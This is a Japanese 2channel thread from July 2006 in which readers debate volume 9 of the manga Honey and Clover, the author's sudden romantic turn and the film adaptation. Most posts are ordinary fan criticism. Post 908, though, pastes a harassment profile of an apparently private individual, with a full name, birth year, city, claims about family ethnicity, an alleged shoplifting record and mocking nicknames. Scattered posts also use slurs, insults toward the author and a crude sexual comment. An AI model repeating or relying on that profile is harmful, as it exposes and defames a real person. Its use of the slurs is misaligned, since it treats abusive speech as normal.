>バイトのかえりに我が家に持って来てくれることがあって…という

そういう従業員のおこぼれ的待遇をnetに会社名出して流すのはどうかなと・・・・・・

844 :花と名無しさん:2006/07/15(土) 21:48:09 ID:???O
9巻の表紙の男たちって
最終的にヒーローの座を勝ち取った奴らって感じ
気に入らんな…

845 :花と名無しさん:2006/07/15(土) 21:48:36 ID:???0
今から9巻読む
凄い展開らしいので楽しみ

846 :花と名無しさん:2006/07/15(土) 21:48:57 ID:???0
正直たけのこも森田さんもはぐとくっつかなくて幸せだと思う
依存心強すぎる女と長続きするのは苦行
しかも天然で自分が最優先だし

847 :花と名無しさん:2006/07/15(土) 21:52:48 ID:???0
>>846
本末転倒じゃない?
こんな展開になって修を選んだからそう思うんだよ。

848 :花と名無しさん:2006/07/15(土) 21:56:59 ID:???O
>>844
海野タンのお気に入り男子。

849 :花と名無しさん:2006/07/15(土) 21:58:14 ID:???0
修と飲み屋って1回くらいしか会ったことないよね

850 :花と名無しさん:2006/07/15(土) 22:00:48 ID:???0
修は恋愛感情があるからすべてを投げ出してリハビリにつき合うのかな。
今までの家族愛+はぐの才能に惚れている関係だったらそこまでしなかった?
だとしたらはぐはやっぱりその愛にこたえないとダメだろうな。

851 :花と名無しさん:2006/07/15(土) 22:01:29 ID:???0
つかぬことをお伺いしたいのですが
前にここで「真山のお持ち帰り」はあゆの勘違いだった?みたいな
エピがあったと読んだ気がするんですが、それは9巻に収録済み?
どこにあったかわからん…orz

852 :花と名無しさん:2006/07/15(土) 22:03:01 ID:???0
>>851
9には入ってないよ。

853 :花と名無しさん:2006/07/15(土) 22:04:36 ID:???0
きれいに取り繕って無難に終わらせるよりは生々しい展開の方がリアルでいいかな
ただちょっと唐突過ぎただけでさ・・・

854 :花と名無しさん:2006/07/15(土) 22:08:15 ID:???0
>>852
ありがとうございます。9巻に入ってないと言うことは
番外編とかだったんでしょうか?

855 :花と名無しさん:2006/07/15(土) 22:08:22 ID:???0
10巻は思いっきり糞展開でフィナーレを迎えてくれ。
そうしたら完全にウミノマンガを嫌いになれる。
次回作もスルーできる。

856 :花と名無しさん:2006/07/15(土) 22:08:51 ID:???0
>>853
そんな意見もあるのか。
自分は、この作者の暴走のような急展開は読者への裏切りに感じた…。


857 :花と名無しさん:2006/07/15(土) 22:10:15 ID:???0
>>855
わかる!とどめをさして欲しいよね。

858 :花と名無しさん:2006/07/15(土) 22:10:57 ID:???0
>847
最初から年齢相応の行動が全くできないはぐが嫌いなだけ

859 :花と名無しさん:2006/07/15(土) 22:11:44 ID:???O
いっそトドメを刺されたがるって凄いなw

860 :花と名無しさん:2006/07/15(土) 22:13:23 ID:???0
>>693
家族同然な上に美大に引っ張り出しておいて今更何悩んでるの?と思ったけど
擬似家族も絵を描くという行為もシチュ萌え前ではただの意味の無い設定になってしまって
ただ場面を深刻に見せるためだけに人物が悩んでモノローグを喋ってるように見えるもの
特にはぐは修に何をそんなに望んでるのか分からない
ウミノさんの人間関係の捉え方に呆れるばかり
理解者が画家の側に寄り添って支えるには人生をやり取りする覚悟が必要なの?
はぐにこんな台詞を言わせるなんて
はぐは今まで何も学んで来なかったと言っているようなもの

861 :花と名無しさん:2006/07/15(土) 22:19:53 ID:???0
>>860
おお、なんか言いたいこと全部言ってもらった感じですっきり。

読者がいろいろ読み取ろうとしたって無駄なんだよ、
だって、読み取るべきものを作者が作り上げてないんだから。

862 :花と名無しさん:2006/07/15(土) 22:21:53 ID:???O
海野タンもはぐも臭も真山も何も考えて無かったんだ。

納 得。

863 :花と名無しさん:2006/07/15(土) 22:25:42 ID:???0
何も考えてないのは、とりとめの無い日常を書くぶんには支障なかったけど、
シリアス展開にもってったことで粗が目立ち始めた

自爆したな羽海野。

864 :花と名無しさん:2006/07/15(土) 22:26:26 ID:???O
>>821-823
キモイ

865 :花と名無しさん:2006/07/15(土) 22:28:51 ID:???0
なんでその3つ?

866 :花と名無しさん:2006/07/15(土) 22:32:21 ID:???O
此処で、誰々の行動が矛盾してるとか、訳分からんとか、こういう意味?って言ってた事の結論は

<特に深い意味も無く何も考えてない>で良いのか…?

シリアスじゃ無かったら良かったのにな…海野さん

867 :花と名無しさん:2006/07/15(土) 22:36:25 ID:???0
ずっとやってきた調子で今の展開もってきたらうまいのに
いきなり振って沸いたようなシリアス展開に
とってつけました感がぬぐえない
シリアスは暗くすれば良いってもんじゃないのに

868 :花と名無しさん:2006/07/15(土) 22:36:31 ID:???0
作品は作り手の実力を超えられないんだよ。
ウミノはしょせん同人の域を出ない漫画家で、
彼女に筋道たった話を期待したワレワレがばかだったんだよ。


―終了―

869 :花と名無しさん:2006/07/15(土) 22:39:00 ID:???0
竹本の愛も森田の愛も羽海野の萌えには勝てなかったってわけだ。

870 :花と名無しさん:2006/07/15(土) 22:41:00 ID:???0
>869
納得した…空しい納得だ

871 :花と名無しさん:2006/07/15(土) 22:48:53 ID:???0
>>854
たぶんそう。
たまたま箱入りDVD七巻だけ買ってみたら
オマケとしてテレビではやらなかったその話
(+おしゃれ達人山崎)のアニメが入ってた。

10巻に入るの期待して気長に待つか
掲載雑誌のバックナンバー探すかDVD買うかしてみては。

872 :花と名無しさん:2006/07/15(土) 22:50:06 ID:???0
箱を開けるために一緒に戦うっていっても
修には今までバーナーの使い方とか重い材料の運搬とかやらせてっから
甘えにしか見えない。
精神的にも支えてるんだろうけど漫画としての描写では森田のほうが
支えてるような描写してたのになぁ


873 :花と名無しさん:2006/07/15(土) 22:54:31 ID:???0
>>869
それに尽きるな。
堺をうらむぞ。

874 :花と名無しさん:2006/07/15(土) 22:58:19 ID:???0
>>821
なんかなあこういう言い方って…
もちろん修はぐアリエネ派だけど修ははぐの便利屋か色ボケ叩かれキャラか
しか道がなかったなんて哀れすぎる。
ウミノに目をつけられたのが運のツキだったね…

875 :花と名無しさん:2006/07/15(土) 23:04:34 ID:???O
大人として見守る修ちゃんは消えました。
ただの男でした。

876 :花と名無しさん:2006/07/15(土) 23:05:56 ID:???0
今更だけど
修役は堺より西島なんとかのほうが良かったな〜

877 :花と名無しさん:2006/07/15(土) 23:07:08 ID:???0
>>874
哀れって・・・
漫画の中では勝ち組なんだからここでなんと言われようと
関係ないでしょう

878 :花と名無しさん:2006/07/15(土) 23:07:57 ID:???0
ウミノの、色々な業界
(俳優、ミュージシャン、小説家、アクセサリー屋、ハム会社など)
へのラブコールやクレクレ
すごくキモい…。

でもウミノは同人マンガ家から
プロマンガ家になれてよかったと思ってるんだろうな。
憧れの業界人達と仕事(対談など)で会えるもんね。

「羽海野さん」なんてもうスレで書かない。
コイツは呼び捨ての「ウミノ」で充分。

879 :花と名無しさん:2006/07/15(土) 23:08:42 ID:???0
>>877
正常世界の視点から見て、はぐを得るってのは勝ち組なんだろうか?
山田をゲットする野宮が一番・・・

880 :花と名無しさん:2006/07/15(土) 23:08:48 ID:???0
>>873
そりゃ逆恨み
恨むべきはウミノのテキトーでおめでたい脳みその方

881 :花と名無しさん:2006/07/15(土) 23:08:50 ID:???O
このスレは覗きに来るけど、もう今月号立ち読みすらしていない。
もうこのスレの反応みてるだけでいいやって気になっている。

882 :花と名無しさん:2006/07/15(土) 23:10:39 ID:???0
大人として見守る修ちゃんは消えました。
ただの雄でした。

883 :花と名無しさん:2006/07/15(土) 23:11:24 ID:???0
>>879
ハチクロワールドは正常世界じゃないですよ?
本人が喜んでれば幸せ

野宮をゲットする山田のほうが幸せだよ。おかげで仕事ももらって。

884 :花と名無しさん:2006/07/15(土) 23:12:10 ID:???0
9巻よんでからここにきたんだけど、
正直修ちゃん相手は気持ち悪い…
すごく安心して読めてた漫画だったから、
ここにきてイタタと変な萌えの連続にぞっとした
人に読ませ続けていて、人に愛されたものを
自己陶酔で終わらせるのはホントやめてほしい

885 :花と名無しさん:2006/07/15(土) 23:13:25 ID:???0
カルシウム取った方がいい奴がいるな

886 :花と名無しさん:2006/07/15(土) 23:14:57 ID:???0
牛乳飲んで寝ます…

887 :花と名無しさん:2006/07/15(土) 23:15:22 ID:???0
9巻買ったから久しぶりに1巻から読み返してみたけど
はぐの知能と色気が一気に上がってるのが笑える。

888 :花と名無しさん:2006/07/15(土) 23:19:33 ID:???0
10巻読みたくないけど買っちゃうんだろうな私。

889 :花と名無しさん:2006/07/15(土) 23:21:24 ID:???0
、あぁ、まだ話は終わっちゃいない。
これだけ論争を巻き起こしてぎゅぎゅっと纏め上げたとしたら、漫画史上に残る傑作になるんじゃないか?
通信簿はまだつけられないよ。

890 :花と名無しさん:2006/07/15(土) 23:23:47 ID:???0
8巻から9巻の不自然なつなげ方で既にかなりの減点です。

891 :花と名無しさん:2006/07/15(土) 23:28:07 ID:???0
まあ同人上がりの初連載にしちゃもった方ではないかな。
もっと経験値あげれ。

892 :花と名無しさん:2006/07/15(土) 23:30:34 ID:???0
「もった方」どころか「大ヒット」

893 :花と名無しさん:2006/07/15(土) 23:31:51 ID:???0
ん、違う漫画の粗とかの話

894 :花と名無しさん:2006/07/15(土) 23:36:01 ID:???0
確かに8巻までは上手くごまかされてたもんなぁ。


895 :花と名無しさん:2006/07/15(土) 23:36:09 ID:VAENcGHn0
もうちょっと森田への恋愛感情をとるか絵をとるかで葛藤があれば、納得してもよかったんだけど・・・。
いっそぐちゃぐちゃの感情にまかせて寝てしまった、でもやっぱり描く事を捨てられない・・・くらいドロドロしてくれればまだ・・・。

さらーっと病院へ戻っていったのがね。。。

森田のこと、そんなに好きじゃなかったんだなあ〜と寂しくもある。


896 :花と名無しさん:2006/07/15(土) 23:40:38 ID:???0
弱い森田はいらないんだよ。
あんだけ無敵キャラ立てといて、よくここまで突き崩せた。
なんか森田系の男に恨みでもあるのか?

897 :花と名無しさん:2006/07/15(土) 23:40:49 ID:???0
>>871
何度もアリガトウございます。
いや、あまりに唐突なご都合エピだったんで
本編のどこに入るのかと思って…


898 :花と名無しさん:2006/07/15(土) 23:41:16 ID:???0
>>841 大人の「無自覚天然」ってすごく罪深いもんだと思う
それを「小さい〜、可愛い〜、不思議〜、みんなこういう子が好きだよね〜」と
思い込んでるウミノが変なんだよ

899 :花と名無しさん:2006/07/15(土) 23:42:15 ID:???0
よっぽど伊勢谷が気に食わなかったのかな。
かっこいいのになー

900 :花と名無しさん:2006/07/15(土) 23:43:30 ID:???0
>>899
それは自分も思った。
萌えられなかったんじゃないの?
森田にウミノ好みの男優ふったら展開変わったかもしれないぞ。

901 :花と名無しさん:2006/07/15(土) 23:44:02 ID:???0
はぐみみたいな
無自覚天然でモテモテって、ドリ厨や
乙女ゲーユーザーが大好きな設定だよね。

902 :花と名無しさん:2006/07/15(土) 23:44:46 ID:???0
堺萌えと、竹本&森田の役萎えのせいですか?>バカウミノ

903 :花と名無しさん:2006/07/15(土) 23:44:50 ID:???0
伊勢谷は腐女子ウケよくないのか。
女関係の噂あるからかな。

904 :花と名無しさん:2006/07/15(土) 23:47:39 ID:???0
つか下唇の下のピアス?は一体何のつもりなんだろう>伊勢谷
「嫌われ松子」の役作りを優先してたカンジ?

905 :花と名無しさん:2006/07/15(土) 23:49:29 ID:???0
最初からEDは決めてたと前にどっかで言ってなかった?>ウミノ
今となっちゃとても信じられないが。このEDに向かうのに
今までの過程があったとは思いにくい。
良いほうに考えれば、よっぽど編集にあれ描けこれ描けと
余計なことを言われてたんだろうと思う。
悪いほうに考えれば…

906 :花と名無しさん:2006/07/15(土) 23:49:39 ID:???0
まあしょうがないな
松子おもしろいもん

907 :花と名無しさん:2006/07/15(土) 23:50:00 ID:???0
嫌 わ れ

は ぐ み の 

一 生

908 :花と名無しさん:2006/07/15(土) 23:53:53 ID:???0
325 名前:名無しって何ですか?:2005/12/27(火) 07:14:19 ID:YevwbuuZ
       ________   
       /:.'`::::\/:::::\   
      /::            \
     /::.  /"""  """\ ヽ
     |::〉   ●"    ●" |  
   (⌒ヽ             |)
    ( __     ( ∩∩ )    |
      |  、_____  /   
      ヽ   \____/  /
       \        /
         \____/

         竹石 圭佑
      (1986〜 愛知県名古屋市)

在日中国人の両親を持つ為か、日本語のアクセントがおかしい時が多々ある。
小学生の時に万引きで補導されたらしく、その頃から既に歪んだ性格であった考えられる。

中学・高校時代…意中の女子には露骨にちょっかいを出して気を引こうとし、また、その時の言動は挙動不審で相手に好意があることがミエミエな為、非常に痛々しい。
でしゃばりで、なぜか偉そうな態度をとっていたが、不良学生相手にはビクビクしながら機嫌をとっていたという不可解な面も併せ持つ。
また特に自分より力の弱い女性教員や女子生徒等を格好の的としていたので、その様な人間には異常に高圧的な態度をとり、馬鹿にし、いつも幼稚な悪口や悪質な嫌がらせを考えて楽しんでいた。

相当な目立ちたがり屋で「地球は自分を中心に回ってる」という性格。しかし、何の能力・才能の欠片もなく、ヘラヘラしていただけなので精神が不安定だったとも考えられる。あだ名はダメ石(何をやってもダメなくせに口八丁なので)→デメ石(非常に出目金に似た顔なので)。

愛知県の底辺の大学に通ってるが、名古屋大学医学部を目指しているらしく、医学生になった自分を日々妄想している。
余談だが、KAT-TUNの田中聖をライバル視しているらしい。

※注 これは自分の知っている範囲の竹石圭佑の情報であり、全てではないと思われ。



909 :花と名無しさん:2006/07/15(土) 23:55:46 ID:???0
うん、はぐに友達がいなくて神様が見えたってエピでも
「まあ、友達いなくて当然だよな」としか思わなかった
山田は友人としてはぐのどこが好きなの?

910 :花と名無しさん:2006/07/15(土) 23:56:01 ID:???O
ミニストップでハチクロキャンペーンやってるの最近知った

まだメロンパンしか食べてないけど

911 :花と名無しさん:2006/07/15(土) 23:56:20 ID:???0
森田ファミリーよいなー
しあわせな時間が短かったっぽいのがせつないけど。

912 :花と名無しさん:2006/07/15(土) 23:56:59 ID:???0
>>909
山田も女の友達少なそう(つかいなそう)だし同志的な友愛じゃないか

913 :花と名無しさん:2006/07/15(土) 23:57:54 ID:???0
山田ともはぐとも友達になりたくないな

914 :花と名無しさん:2006/07/15(土) 23:59:11 ID:???0
眠ってる山田の脚にぶっかけたい



はぐはいいや

915 :花と名無しさん:2006/07/16(日) 00:03:47 ID:???0
9巻買った。いきなり作風が違ったように見えた。
今まで真山、山田、理花、野宮の関係はしつこいくらいに
じっくり描いてきたのに、
どうしてはぐの話はいきなり取ってつけたような急展開なの?

いまさらだけど、はぐ視点の森田への気持ちとか、竹本への気持ちとか……
そういうのをきちんと描いてほしかった。
はぐの話には感情移入できん。

916 :花と名無しさん:2006/07/16(日) 00:04:00 ID:???0
はぐは貴重な大学生活を臭という保護者のもとで過ごしたのがいけなかった。
あんな過保護じゃ成長なんざ期待するのが無理。

育ててしまった責任とればいいんじゃないの?臭。
森田と竹本は光を目指しとくれ。

山田も商店街の男どもの甘やかしが原因であんなお子ちゃま。
責任すら取らせてもらえないからいまだに…

917 :花と名無しさん:2006/07/16(日) 00:05:29 ID:???0
一巻みると、どう考えても竹本か森田なのにねぇ

918 :花と名無しさん:2006/07/16(日) 00:08:03 ID:???O
>>915
山田はウミノさんの理想の女の子だからまだ客観的に丁寧に描けてた。

はぐは自分で入り込み過ぎて客観視出来ずに唐突な印象になった…

だとしたら本当に嫌だよ。ウミノさんよ。

919 :花と名無しさん:2006/07/16(日) 00:27:02 ID:7qLsJBpkO
>910ドーナッツ食べた。普通においしかった

920 :花と名無しさん:2006/07/16(日) 00:30:13 ID:???0
山田→理想
はぐ→自己投影

じゃないか?

921 :花と名無しさん:2006/07/16(日) 00:53:46 ID:???0
みんな、花本が好きだったんだなー
それも、かなり真剣に…

と、通りすがりの者がのたまってみる。
ごめんね。

922 :花と名無しさん:2006/07/16(日) 00:54:19 ID:???0
自己投影の強いはぐと作者が理解不能の森田、堺というリアル人物の影響濃すぎ(ここ最近の外見)な修。
この3人がメインになったらこうなってしまうのはある意味し方が無いのか。

923 :花と名無しさん:2006/07/16(日) 01:00:42 ID:y+R/a2VH0
読者は作者の自己満に振り回されたってこと・・・

924 :花と名無しさん:2006/07/16(日) 01:01:16 ID:???0
ソボクなギモン
・森田父と森田母はどこに行ったの?
・城山さん萌えの人がまだ発生してないように見えるけどなぜ?

925 :花と名無しさん:2006/07/16(日) 01:05:16 ID:???O
>>921
花本じゃない。
ハチクロだよ。

926 :花と名無しさん:2006/07/16(日) 01:07:57 ID:???0
映画があったのが間違いか。
海に行く五人とか、堺とか、森田を愛せなくなってるとか
影響受けすぎ。
でも自分は映画楽しみにしてるよ。あれのラストを自分のハチクロラストにする。

927 :花と名無しさん:2006/07/16(日) 01:09:02 ID:???0
森田は少女漫画には現実的じゃないという点でも典型的な「相手役」
ちょっとキケンな感じのする黒髪の男で
ウミノさんも伊勢谷とか深層心理ではキライじゃないと思う。
はぐが森田を警戒するのと同じじゃないかな。

928 :花と名無しさん:2006/07/16(日) 01:10:35 ID:???0
よく買う服屋でハチクロコラボが出ててびっくりした。
9巻買った。コミックス派なので

orz

929 :花と名無しさん:2006/07/16(日) 01:11:51 ID:tZ3GwRNu0
持たざる者の俺が来ましたよ

「家畜に神はいないっ!!」を思い出して欝になった

930 :花と名無しさん:2006/07/16(日) 01:12:18 ID:???0
>>924
城山って萌えてる人が発生してないのが不思議なほどの萌えキャラか?

931 :花と名無しさん:2006/07/16(日) 01:12:54 ID:???0
もうはぐが誰を選ぼうか知ったこっちゃねぇ
達夫はどうなったか誰か教えてくれ。頼む

932 :花と名無しさん:2006/07/16(日) 01:17:54 ID:???0
もしかして、はぐが死んだらいいとか思ってる人いる?

933 :花と名無しさん:2006/07/16(日) 01:20:49 ID:???0
修ちゃんが死んではぐが理花化する

934 :花と名無しさん:2006/07/16(日) 01:23:23 ID:???0
>>933
しかし、社会生活を一人では営めないはぐは、ヤクザに売られて風俗業界へ・・・

935 :花と名無しさん:2006/07/16(日) 01:24:02 ID:???0
はぐが死んで森田×カオル様

936 :花と名無しさん:2006/07/16(日) 01:29:04 ID:FSO7yb+qO
スピッツの魔法の言葉でさす二人って?臭とはぐ?

937 :花と名無しさん:2006/07/16(日) 01:30:55 ID:???0
>>936
やめてくれ今聴いてたんだ
2人=5人だと勝手に置き換えて聴いてる
ハチクロは5人の子供が主役だとオモテるから

938 :花と名無しさん:2006/07/16(日) 01:31:29 ID:???0
>>936
森田「コロボックル!」
はぐ「敵!」

939 :花と名無しさん:2006/07/16(日) 01:34:09 ID:???O
オサレ可哀想
オサレと美和子はあれで終わりかね…

940 :花と名無しさん:2006/07/16(日) 01:37:06 ID:???O
>>927
何もしないで傍に居てくれるだけで良い、とか何考えてるか分からないとか典型少女漫画の王子だよなー…あー…惜しかった…orz

941 :花と名無しさん:2006/07/16(日) 01:38:03 ID:???0
笑う大天使でも「コロボックルちゃん」と呼ばれる女の子が出てくるけど
ウミノさん川原泉あたり読んでたっぽいよなー

942 :花と名無しさん:2006/07/16(日) 01:38:23 ID:???0
コミック派の私が10巻の展開を予想。
森田が自ら自分の右手をぶっさし、「どっちが先に治すか勝負だ!」

ところではぐには左手を鍛えるという選択肢はなし?

943 :花と名無しさん:2006/07/16(日) 01:44:14 ID:???0
ともさかりえの旦那が脚本だということで
映画観に行くことに決めますた。

944 :花と名無しさん:2006/07/16(日) 01:51:59 ID:???0
>>940
あと暗い過去とかねー

945 :花と名無しさん:2006/07/16(日) 01:52:53 ID:???0
てけもとは典型的ななんだったんだろう

946 :花と名無しさん:2006/07/16(日) 01:53:22 ID:???0
いい人

947 :花と名無しさん:2006/07/16(日) 01:54:18 ID:???0
いい人

948 :花と名無しさん:2006/07/16(日) 01:54:31 ID:???0
タケモチョ。・゚・(ノД`)・゚・。

949 :花と名無しさん:2006/07/16(日) 01:55:20 ID:???0
タケノコ。・゚・(ノД`)・゚・。

950 :花と名無しさん:2006/07/16(日) 01:55:48 ID:???0
どうでもいい人

951 :花と名無しさん:2006/07/16(日) 01:58:24 ID:???0
今950が酷いこと言った

952 :花と名無しさん:2006/07/16(日) 01:59:22 ID:???0
今 つらいのは竹本
苦しんでいるのは竹本

953 :花と名無しさん:2006/07/16(日) 01:59:37 ID:???0
950タケノコに謝れ!あやまれ!

954 :花と名無しさん:2006/07/16(日) 01:59:50 ID:???0
>>951
「帰ってきてくれてありがとう」って言ってもらっただけ御の字じゃないか?

955 :花と名無しさん:2006/07/16(日) 02:01:19 ID:???0
「帰ってきてくれてありがとう」

って

告白の返事だよ?
ほんとにどうでもいい人だ…。

956 :花と名無しさん:2006/07/16(日) 02:05:16 ID:???0
すべて微妙に臭ちゃんはぐにスイッチするための言い訳にしか読めないこの怒涛の展開
少女漫画の(変な)悲劇の王子様と、愛してくれる優しい向上心あるいい人。
どっちをも切るためのプロセスだったのか、ハチクロ。

957 :花と名無しさん:2006/07/16(日) 02:06:47 ID:???0
オレ すごく そういう竹本に弱いみたい

何か……ハマるっていうか
のめっていっちゃうっていうか

うまく言えないけど

958 :花と名無しさん:2006/07/16(日) 02:09:59 ID:???0
>>957
がんばれ、いい人

959 :花と名無しさん:2006/07/16(日) 02:10:17 ID:???0
森田が振られたっていうけどさ、森田が直接ふられた描写ってあったっけ?

960 :花と名無しさん:2006/07/16(日) 02:11:55 ID:???0
直接描写がなきゃ流れも読めんのかこの池沼はwwww
ゆとり教育の効果は計り知れないなwwww

もりた は ふられた …


961 :花と名無しさん:2006/07/16(日) 02:14:40 ID:???0
はぐはちゃんと返事しなくてずるいよ。
その点では山田のほうが断然偉いな。

962 :花と名無しさん:2006/07/16(日) 02:16:00 ID:???0
>>959
はぐが病院に帰った段階で振られている。

963 :花と名無しさん:2006/07/16(日) 02:16:30 ID:???0
No!と言いつつDANDAN心惹かれている山田のどこが偉いのか

964 :花と名無しさん:2006/07/16(日) 02:18:08 ID:???0
5人一気にふってたよ

965 :花と名無しさん:2006/07/16(日) 02:18:14 ID:???0
山田は、一度でいいから真山に抱かれたら満足なのかな?

966 :花と名無しさん:2006/07/16(日) 02:20:41 ID:???0
>>941
柚子嬢はフキの下の賢者サマ。
浮世離れしたお嬢様方とも猫かぶりの御友人方とも
同じように適度な思いやりのある交流が持てる
自称パイオニア庶民サマです。

おねだりで生きているメンヘルカバとは月とスッポン。
同じコロボックルでこうも違うとは。

967 :花と名無しさん:2006/07/16(日) 02:21:43 ID:???0
山田もしつこいな。最中に飲み屋を真山って呼び間違えてダメージ与えてそう。
そして自分が被害者面しそう。

968 :花と名無しさん:2006/07/16(日) 02:21:53 ID:???0
山田の野宮キープっぷりも相当ひどいよな。

969 :花と名無しさん:2006/07/16(日) 02:23:24 ID:???0
ここにきてたけのこキープもしだしたら悪女確定だなw

970 :花と名無しさん:2006/07/16(日) 02:29:00 ID:???O
柚子もおっさんとくっついたっけ。あっちは健全な流れだったけどね。

971 :花と名無しさん:2006/07/16(日) 02:33:11 ID:???0
はぐが森田をふった理由が
「一緒に戦ってくれる人じゃなかったから」
ってことみたいだけど、はぐは一度でも森田に
一緒に戦っていきたいって言ったことがあるのか?
勝手に心の中で思って、勝手に違ったとショックを
受けて(たかどうかわからないけど)るだけなんじゃないの?

とことんずるい女だと思う。

972 ::2006/07/16(日) 02:52:56 ID:Mv7Y41hVO
誰もが予想・期待しなかった裏切り。だったら最初から修×はぐの『ほのぼの絵日記』でも描いてればよかったのに。そしたら誰も(キャラ達含め)傷つかず・空しさを感じずに済んだのに。
まず、自分の生活の維持も出来ない人が欲張りすぎ。人を利用しすぎ。自立しようと左手を訓練するなり、今までと違った芸術・生き方を目指すべき。竹本くんを見習って『自分探しの旅』に出て『生きる』ことがどんなに大変か学んでこい。

長文すみませんでしたm(_ _)m

973 :花と名無しさん:2006/07/16(日) 03:04:37 ID:???0
寄生も生き方、生きることの一つの選択だよ。自然界を見渡せばわかる。
けどさんざん成長大切さを描いたあとに見せられるとちょっと…

974 :花と名無しさん:2006/07/16(日) 03:09:10 ID:???0
絶対左手で描いた芸術、口で描いた芸術路線にいくと思ったので
リハビリにすらびっくりのコミック派。

うみのさんの漫画、それこそダンクも高村もゲームも薄いページのオリジナルも
ずーっと追っかけてたよ。暗い話と明るいギャグ、
どちらもそう長い話ではなかったからよかったのか、と思った。

一本の長編に全部入れたらこんなに、ああもう、
ずっとファンだからあんまり言いたくはないんだがグダグダになるもんなんすね。

不幸自慢はリカだけでいいよ。暗いのは竹本のクリスマスだけでいいよ。
森田の過去も、修ちゃんへの、はぐの降ってわいた愛情もいらないよ。

いらないよーーーーー!!!!

975 ::2006/07/16(日) 03:24:08 ID:Mv7Y41hVO
今までの皆の成長・頑張りを裏切らないでほしい…羽海野さんは『その過程が大切』で終わらせるのかな??
でも、修を応援してる人がいるならごめんなさい。

976 :花と名無しさん:2006/07/16(日) 03:43:53 ID:???0
森田の過去は蛇足だったなあ・・・
まぁ言ってしまえばコーラス移ってから全部蛇足なんだけど

977 ::2006/07/16(日) 03:50:28 ID:Mv7Y41hVO
≫973さん
人間には動物のように『本能』だけではなく『自由意志』があるし、いつまでも誰かに依存してると自分にとって損だと思うよ‥漫画の世界のことだけど、いまはぐが修と生きていくとするなら『「芸術」という名の好き勝手をさせてくれる相手だから』としか思えないよ。

978 :花と名無しさん:2006/07/16(日) 04:16:40 ID:woC5h1yVO
あれ?花本先生ってDOUTEI・・・?

979 :花と名無しさん:2006/07/16(日) 04:56:04 ID:uwMj4wAj0
ガーン・・・。はぐは森田と?それとも男らしくなった竹本と??
っと、ワクワクしてたら・・・・

なんで花本せんせい・・・・?

2ちゃんなんか見るんじゃなかったよー。えーん。

980 :花と名無しさん:2006/07/16(日) 04:56:13 ID:???0
今月号の山田さんの動揺っぷりってのはまさに読者の反応を模してるんだと思ってたんだが。
いろいろとショックを受けるのは分かるんだが、作者が無自覚ってのはさすがにちょっと違うかと思う。

981 :花と名無しさん:2006/07/16(日) 05:01:24 ID:???0
ところでなんかその堺雅人に萌え狂ってるみたいな話ってのはどっからでてきたの?
役者にのめり込みすぎて展開が変わったみたいな推理は
どうも自分の想像力の範疇を超えてしまってまったく理解できてなかったりする。

982 :花と名無しさん:2006/07/16(日) 05:21:04 ID:xj9MPZkmO
映画大失敗。
蒼井優はかわいい。けど全く実力生かされてない。ストーリーめちゃくちゃW過ぎ。修‥テツシじゃんWテツシにしか見えないし笑顔キモ過ぎて無理。森田のみ違和感無しで見れたかんじ。
あくびでる映画

983 :花と名無しさん:2006/07/16(日) 05:38:00 ID:???0
さてと 白おにぎり・魚ソー・黄色たくあんの朝飯でもつくろっと

984 :花と名無しさん:2006/07/16(日) 06:20:21 ID:???0
>>982
映画の話は映画板のスレでやってね

あと開業もなしに変なところで「w」付けるのやめてね

そしてもうこないでね

985 :花と名無しさん:2006/07/16(日) 06:28:17 ID:???0
>981
今出ているダヴィンチのインタビュー読むと
ここの住人の推測は全然はずれていないことがよくわかるよ。
ウミノさんの修萌え、っつーか堺萌え。
影響受けやすいって自分でも認めているし。

最初から修はぐエンドを考えていたとしても
それは保護者としての修と美術修行に行く、
くらいの爽やかなエンディングだったはず。

臭に恋愛感情もたせてしまったのは、
絶対最近の作者の暴走だと思う。

インタビュー読んで、私はもうあきらめた。
さよならハチクロ。ウミノの漫画には二度と期待しない。

986 :花と名無しさん:2006/07/16(日) 06:34:22 ID:???0
>>981
推理じゃなくて、ウミノさんがインタビューや対談で
本当にそういう発言をしてるんだよ


987 :花と名無しさん:2006/07/16(日) 06:35:09 ID:???0
ところで新スレどなたかお願いします

988 :花と名無しさん:2006/07/16(日) 06:36:03 ID:???0
>>985
ありがとう。今度チェックしてみます。

989 :花と名無しさん:2006/07/16(日) 07:07:34 ID:???0
やばい。

宮大工も前のオーダー家具会社の時みたいに、就職できるもんだと思ってたら
やっぱ無理でした的展開を考えてしまった。たけのこが絶対に自殺する。

大怪我してる好きなコには何もしてあげられないしフラれてるし、
卒業しちゃうのに就職決まらないし、また幻聴きこえてきて…やばい、この展開凄く見たい。


でもホントにこんな展開になっても、みんなの未来エピソードのひとつ程度な扱いで
山田あたりが「竹本君も死んじゃったしね…」ぐらいの台詞しか言われないんだ。

990 :花と名無しさん:2006/07/16(日) 07:48:35 ID:???0
一条ゆかりって両手で漫画描いてるらしいよ、右が腱鞘炎になりやすいから。
はぐだって、幸い彫刻でも陶芸でも建築でもなく片手である程度出来る絵が活動の中心みたいだし
ここで左って選択肢が無いのはおかしいな・・・

991 :花と名無しさん:2006/07/16(日) 07:52:19 ID:???0
出来る事なら治したいってことじゃないのかな。
左手で絵が描けるように練習するのも、
右手をリハビリするのも時間的には大した違いはないような気がする。
精神面での違いは多少はありそうな気がするけど実際はどうなんだろ。

992 :花と名無しさん:2006/07/16(日) 07:59:00 ID:???0
うーんそれにしては、
「描くことを手放す」「絵を描かないで一生過ごす」とか
オールオアナッシングな雰囲気になってない?

てか次スレ・・・・・・・・・・・・

993 :花と名無しさん:2006/07/16(日) 08:01:55 ID:???0
左を鍛えれば確実に描けるようになるけど
右は戻らない可能性もあるっていってたよ。

994 :花と名無しさん:2006/07/16(日) 08:48:43 ID:???0
つ次スレ

http://comic6.2ch.net/test/read.cgi/gcomic/1153007258/l50

995 :花と名無しさん:2006/07/16(日) 09:51:21 ID:???0
>>994
乙!!!!

996 :花と名無しさん:2006/07/16(日) 09:53:23 ID:???0
乙ですよ?

997 :花と名無しさん:2006/07/16(日) 09:55:18 ID:???0


998 :花と名無しさん:2006/07/16(日) 09:59:56 ID:???0
ちょうこ梅い

999 :花と名無しさん:2006/07/16(日) 10:03:15 ID:???0
コンクリート埋め

1000 :花と名無しさん:2006/07/16(日) 10:03:29 ID:???0
予定通り

1001 :1001:Over 1000 Thread
このスレッドは1000を超えました。
もう書けないので、新しいスレッドを立ててくださいです。。。

227 KB
★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)